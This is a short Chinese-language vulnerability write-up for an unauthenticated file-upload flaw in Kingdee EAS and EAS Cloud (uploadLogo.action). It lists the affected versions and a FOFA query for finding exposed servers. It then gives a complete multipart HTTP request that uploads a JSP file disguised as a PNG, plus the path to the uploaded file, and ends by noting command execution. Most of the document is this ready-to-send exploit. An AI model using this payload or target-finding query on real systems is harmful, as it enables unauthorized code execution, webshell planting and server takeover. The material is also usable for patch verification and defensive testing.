J16-3金蝶-EAS-文件上传
漏洞描述:
金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,未经身份认证的攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
影响版本:
EAS 8.0、EAS 8.1、EAS 8.2、EAS 8.5、EAS Cloud 8.6私有云、EAS Cloud 8.6公有云
EAS Cloud 8.6SP1、EAS Cloud 8.8
网站图片:
网络测绘:
fofa语法:
FOFA:app=“Kingdee-EAS”
漏洞复现:
payload:
POST /plt_portal/setting/uploadLogo.action HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=04844569c7ca7d21a3ca115dca477d62
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="chooseLanguage_top"; filename="chooseLanguage_top"
ab
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="dataCenter"; filename="dataCenter"
ac
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="insId"; filename="insId"
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="type"; filename="type"
ad
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="upload"; filename="1.jsp"
Content-Type: image/png
<%out.print("test");%>
--04844569c7ca7d21a3ca115dca477d62--
效果图:
PS:响应体会回显上传后的文件名
验证url
http://your-ip/portal/res/file/upload/回显的文件名.jsp
命令执行